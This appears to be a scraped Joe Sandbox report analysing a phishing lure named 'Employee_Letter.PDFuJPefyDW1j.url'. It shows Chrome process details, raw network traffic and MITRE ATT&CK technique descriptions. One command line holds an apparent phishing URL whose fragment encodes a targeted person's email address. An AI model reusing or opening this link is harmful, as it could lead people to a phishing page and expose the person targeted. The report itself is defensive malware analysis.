6e 73 3e Data Ascii: BND 3 CON\WNS 0 197MS-CV: zr/kCGpjMkyzR2cx.3Context: 8804099318856231<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
2024-12-19 19:22:21 UTC	14	IN	Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a Data Ascii: 202 1 CON 58
2024-12-19 19:22:21 UTC	58	IN	Data Raw: 4d 53 2d 43 56 3a 20 67 42 4f 43 4e 5a 4e 69 30 45 2b 4a 75 2b 55 54 47 4d 4d 76 78 51 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e Data Ascii: MS-CV: gBOCNZNi0E+Ju+UTGMMvxQ.0Payload parsing failed.

Target ID:	0
Start time:	14:20:21
Start date:	19/12/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://canseguros.com.br/homecoming/index#a2FyZW4uZ29sb3ZlcnNpY0BlbmFibGVjb21wLmNvbQ==
Imagebase:	0x7ff684c40000
File size:	3'242'272 bytes
MD5 hash:	5BBFA6CBDF4C254EB368D534F9E23C92
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	3
Start time:	14:20:21
Start date:	19/12/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2128 --field-trial-handle=2056,i,12037651299568785254,16993497860421757936,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff684c40000
File size:	3'242'272 bytes
MD5 hash:	5BBFA6CBDF4C254EB368D534F9E23C92
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Chronological Activities

Disassembly

⊘No disassembly

Description:	Adversaries may abuse Internet browser extensions to establish persistent access to victim systems. Browser extensions or plugins are small programs that can add functionality and customize aspects of Internet browsers. They can be installed directly or through a browser's app store and generally have access and permissions to everything that the browser can access.
Tactics:	Persistence
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Process: Process Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Employee_Letter.PDFuJPefyDW1j.url

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

Phishing

Compliance

Networking

System Summary

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

LLM Input / Output

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Chrome Cache Entry: 41

Chrome Cache Entry: 42

Chrome Cache Entry: 43

Static File Info

General

File Icon

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTPS Proxied Packets

Statistics

CPU Usage

Memory Usage

Behavior

System Behavior

Analysis Process: chrome.exePID: 5176, Parent PID: 4004

General

Chronological Activities

Analysis Process: chrome.exePID: 3060, Parent PID: 5176

General

Chronological Activities

Disassembly

Windows Analysis Report
Employee_Letter.PDFuJPefyDW1j.url